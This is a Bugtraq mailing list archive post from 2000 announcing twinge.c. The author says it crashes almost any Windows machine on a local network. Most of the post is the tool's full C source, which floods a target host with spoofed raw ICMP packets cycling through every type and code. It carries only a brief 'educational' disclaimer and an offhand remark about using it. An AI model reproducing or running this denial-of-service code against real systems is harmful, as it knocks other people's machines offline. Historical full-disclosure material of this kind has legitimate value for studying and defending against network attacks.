Bugtraq mailing list archives
crash windows boxes on your local network (twinge.c)
From: sinkhole () NILL NET (sinkhole () NILL NET)
Date: Thu, 10 Feb 2000 13:36:57 -0500
Hi Everyone. I've had this sitting on my hard drive for awhile but it still works, so I figured it was time to see this get fixed. Crashes almost any windows box on your local network. Compiles on Linux. If you can't figure it out you shouldn't be using it anyways. =) -sinkhole -- BEGIN twinge.c -- /* twinge.c - by sinkhole () dos org [6/99] this cycle through all the possible icmp types and subtypes and send to target host, 1 cycle == 1 run thru all of em Crashes almost all Windows boxes over a LAN. DISCLAIMER: This is a PoC (Proof Of Concept) program for educational purposes only. Using this program on public networks where other people are affected by your actions is _HIGHLY ILLEGAL_ and is not what this is made for. for without help from ryan this wouldnt have been coded. =) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> long counter=1; void usage(const char *progname, const char *user) { fprintf(stderr, "twinge.c by sinkhole () dos org - licensed for use by %s\n", user); fprintf(stderr, "This is a PoC (Proof of Concept) program for educational uses.\n"); fprintf(stderr, "usage: %s <dest> <cycles [0 == continuous]>\n", progname); } int resolver(const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); } unsigned short in_cksum(addr, len) /* normal checksum */ u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int send_packet(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, long seq, int ty, int code) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; #ifdef DEBUG printf("type: %d code: %d\n", ty, code); #endif srandom((getpid()+time(NULL)+seq)); packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->id = htons(random()*(seq*getpid()*3)); ip->frag_off = 0; ip->tot_len = strlen(packet); ip->ttl = 255; ip->protocol = IPPROTO_ICMP; ip->saddr = random()+ty+getpid(); ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = ty; icmp->code = code; /* 3(unreach): cycle 0-9 5(redirect): cycle 0-3 11(time_exceed): cycle 0-1 */ icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { perror("sendto"); exit(0); } free(packet); return(0); } int main(int argc, char *argv[]) { struct sockaddr_in dest_addr; unsigned int i, x, s, sock; unsigned long src_addr; char owner[10]; strcpy(owner, "t"); strcat(owner, "h"); strcat(owner, "e"); strcat(owner, " "); strcat(owner, "p"); strcat(owner, "u"); strcat(owner, "b"); strcat(owner, "l"); strcat(owner, "i"); strcat(owner, "c"); if(argc < 2) { usage(argv[0], owner); exit(0); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket. (need UID 0)\n"); return(-1); } if (resolver(argv[1],0,&dest_addr) == -1) { fprintf(stderr, "Cannot resolve destination\n"); exit(0); } src_addr = dest_addr.sin_addr.s_addr; for (s = 0;s <= atoi(argv[2]) || (atoi(argv[2]) == 0);s++) { for (i = 0;i < 18;i++) { switch(i) { case 3: /* cycle 0-9 */ for (x=0; x<=9; ++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; case 5: /* cycle 0-3 */ for (x=0; x<=3; ++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; case 11: /* cycle 0-1 */ for(x=0;x<=1;++x) send_packet(sock, src_addr, &dest_addr, counter, i, x); break; default: /* just use 0 =) */ send_packet(sock, src_addr, &dest_addr, counter, i, 0); } ++counter; } } } -- END twinge.c --
Current thread:
- Re: Evil Cookies., (continued)
- Re: Evil Cookies. Dylan Griffiths (Feb 07)
- 'cross site scripting' CERT advisory and MS Eric Lecht (Feb 08)
- Re: 'cross site scripting' CERT advisory and MS Dustin Miller (Feb 09)
- Re: 'cross site scripting' CERT advisory and MS David LeBlanc (Feb 10)
- Re: 'cross site scripting' CERT advisory and MS Marc Slemko (Feb 11)
- Re: 'cross site scripting' CERT advisory and MS Rishi Lee Khan (Feb 14)
- Packet Tracing (linux klog patch) Dragos Ruiu (Feb 12)
- Re: Packet Tracing (linux klog patch) Andrzej Bialecki (Feb 15)
- Re: Packet Tracing (linux klog patch) Dragos Ruiu (Feb 17)
- Re: Packet Tracing (linux klog patch) Andrzej Bialecki (Feb 17)
- crash windows boxes on your local network (twinge.c) sinkhole () NILL NET (Feb 10)
- Re: crash windows boxes on your local network (twinge.c) Elias Levy (Feb 14)
- DDOS Attack Mitigation Elias Levy (Feb 11)
- TESO - Nameserver traffic amplify and NS route discovery Sebastian (Feb 12)
- Re: DDOS Attack Mitigation Darren Reed (Feb 13)
- Re: DDOS Attack Mitigation Alan Brown (Feb 14)
- Re: DDOS Attack Mitigation Darren Reed (Feb 14)
- NetBSD Security Advisory 1999-012 Daniel Carosone (Feb 15)
- Re: DDOS Attack Mitigation Chris Cappuccio (Feb 15)
- Re: DDOS Attack Mitigation Carson Gaspar (Feb 15)
- Re: DDOS Attack Mitigation John Edwards (Feb 15)